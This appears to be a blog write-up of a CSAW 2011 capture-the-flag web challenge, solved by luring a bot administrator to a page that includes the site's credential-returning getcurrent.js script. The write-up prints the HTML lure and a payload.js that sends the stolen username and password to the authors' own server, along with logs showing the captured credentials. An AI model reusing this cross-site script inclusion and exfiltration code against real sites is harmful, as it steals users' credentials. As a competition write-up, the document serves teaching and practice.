Better late than never.
The solution
If you check the site’s use of AJAX, you will find an interesting url sending back the plain text password at http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js. This page returns something like this :
var current = {"access":"1","username":"haxor","password":"abc123"}
The contact page showed clues that you can send an url to the webmaster that he/it will click on. The field had the “Your message or website” label and the page included warning saying “Just don’t send me anything that might get me hacked!”. Right. Let’s do just that. We sent a url and got a hit from their end couple minutes later.
128.238.66.100 - - [25/Sep/2011:20:02:15 +0400] "GET /csaw HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"
Can we get this guy/robot to execute javascript? The answer is yes. We are lucky, the script puts the javascript object inside the window.current variable.
Our first attempt was to include the getcurrent.js with the following url http://csawstf.poly.edu:40004/challenge2/json/getcurrent.js but this failed probably because csawstf.poly.edu resolve to an internal IP address on their end and NAT translation failed from inside. The admin instead use the private IP (192.168.4.4, later gave as an hint on the mailling list) or the public IP directly. From inside, these two addresses gave the admin account password :
http://128.238.66.100:40004/challenge2/json/getcurrent.jshttp://192.168.4.4/challenge2/json/getcurrent.js
We sent and http url to the following html file :
<html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <title>My Page</title> <script src="http://128.238.66.100:40004/challenge2/json/getcurrent.js"></script> <script src="http://our_server/payload.js"></script> </head> <body> Lots of pictures of cats... </body> </html>
With this Javascript :
// payload.js
var xmlhttp=new XMLHttpRequest();
if(typeof(current) != "undefined") {
xmlhttp.open("GET","http://our_server/csaw?" + current.username + "--" + current.password + "--" + current.access, true);
}
else {
xmlhttp.open("GET","http://our_server/csaw?missed",true);
}
xmlhttp.send();
Got us this in our log :
128.238.66.100 - - [25/Sep/2011:20:20:35 +0400] "GET /csaw?administrator--2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8--1000" HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/4.6; Linux) KHTML/4.6.2 (like Gecko) Kubuntu"
We logged in with administrator and 2d8a579d4d4bbd98399f47df0d6c8fd0be22e3a8 as the password and got the key on the main page.
Things that didn’t work
We tried sending javascript: url but it didn’t work. For example, javascript:window.location="http://our_server/a"+"b" has made a http://our_server/a"+"b hit in our log. They probably use a regex that begins with http.
For some reason, include the javascript inline the HTML didn’t work for us. But maybe we just had a syntax error.
Sending lots of picture of cats didn’t help. Animated gif was not the solution.
Saturday night and sunday morning, the queue to get our link visited was very long. Once the link was sent, it took up between 30 minutes and an hour to get a hit back. Whoever filled the queue, that wasn’t nice.
The extras
The source code was available at http://csawctf.poly.edu:40004/challenge2/dev. Here is a copy of the archive. He found this using our favourite dead file scanner, Tachyon.